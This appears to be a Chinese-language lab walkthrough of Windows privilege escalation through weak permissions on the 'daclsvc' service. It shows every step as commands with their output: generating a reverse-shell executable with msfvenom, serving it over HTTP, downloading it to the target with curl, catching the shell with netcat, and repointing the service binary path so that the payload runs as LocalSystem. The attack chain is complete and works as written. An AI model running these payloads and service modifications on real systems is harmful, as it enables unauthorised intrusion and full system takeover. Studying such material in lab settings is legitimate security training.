弱服务权限daclsvc提权
模拟获取到内网机器
xfreerdp连接上去
xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.195.130root@ip-10-10-25-36:~/Desktop# xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.195.130
connected to 10.10.195.130:3389
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: CERTIFICATE NAME MISMATCH! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
The hostname used for this connection (10.10.195.130)
does not match the name given in the certificate:
Common Name (CN):
WIN-QBA94KB3IOF
A valid certificate for the wrong name should NOT be trusted!
Certificate details:
Subject: CN = WIN-QBA94KB3IOF
Issuer: CN = WIN-QBA94KB3IOF
Thumbprint: 94:74:b9:ba:dc:f7:a2:ca:9e:d0:00:e7:4a:33:22:1a:5a:d2:a1:2c
The above X.509 certificate could not be verified, possibly because you do not have the CA certificate in your certificate store, or the certificate has expired. Please look at the documentation on how to create local certificate store for a private CA.
Do you trust the above certificate? (Y/N) Y
生成shell
root@ip-10-10-25-36:~/Desktop# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.25.36 LPORT=6666 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe
root@ip-10-10-25-36:~/Desktop#开启http服务
python3 -m http.server 1010目标机使用curl下载远程文件
curl -O 10.10.25.36:1010/reverse.exe
运行reverse.exe反弹shell
root@ip-10-10-25-36:~/Desktop# nc -lnvp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from 10.10.195.130 49746 received!
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\user\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54A8-AA62
Directory of C:\Users\user\Desktop
02/28/2023 06:16 AM <DIR> .
02/28/2023 06:16 AM <DIR> ..
06/05/2020 07:32 AM 959 AdminPaint.lnk
08/19/2020 10:06 AM 737 PrivEsc - Shortcut.lnk
02/28/2023 06:16 AM 7,168 reverse.exe
3 File(s) 8,864 bytes
2 Dir(s) 30,850,797,568 bytes free
C:\Users\user\Desktop>服务利用不安全服务的权限
使用accesschk.exe 来检查"用户"的帐户上的权限"daclsvc"服务:
由于管理员可能没有配置好相关用户权限导致普通用户可能对某些服务拥有过多的权限,就可能从普通用户升级为管理员。
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user *
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc运行结果
C:\Users\user\Desktop>C:\PrivEsc\accesschk.exe /accepteula -uwcqv user *
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user *
RW daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
C:\Users\user\Desktop>C:\Users\user\Desktop>C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
RW daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
C:\Users\user\Desktop>这里使用kali自带的accesschk.exe;
可以看到当前用户拥有更改daclsvc服务配置权限(SERVICE_CHANGE_CONFIG)。
查看服务信息,看下它与运行系统的权限(SERVICE_START_NAME):
sc qc daclsvc运行结果
C:\Users\user\Desktop>sc qc daclsvc
sc qc daclsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: daclsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\DACL Service\daclservice.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DACL Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user\Desktop>查看服务信息可以看到daclsvc有一个binarypath指向具体的可执行文件
SERVICE_START_NAME 那里写的是LocalSystem代表的是具备系统的权限
BINARY_PATH_NAME 这个服务路径,可以看到路径是在C:\Program Files\DACL Service\daclservice.exe,可以尝试把我们上传的shell路径指到[BINARY_PATH_NAME]从而将执行的权限反弹回来获取该执行的权限
C:\Users\user\Desktop>sc config daclsvc binpath= "\"C:\Users\user\Desktop\reverse.exe\""
sc config daclsvc binpath= "\"C:\Users\user\Desktop\reverse.exe\""
[SC] ChangeServiceConfig SUCCESS
C:\Users\user\Desktop>再次查看服务信息
C:\Users\user\Desktop>sc qc daclsvc
sc qc daclsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: daclsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Users\user\Desktop\reverse.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DACL Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user\Desktop>
重新启动服务
net start daclsvc提前开启nc再重新启动服务就会获得一个系统shell;
因为是由系统运行的所以弹回来也是继承了该权限
免责声明:
H4K6技术社区所提供的一切软件、教程、漏洞信息、破解补丁、注册机、注册信息及软硬件解密分析文章等仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请自行承担。H4K6技术社区不承担任何因为技术滥用所产生的连带责任。H4K6技术社区所有发布的信息资源来源于互联网,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
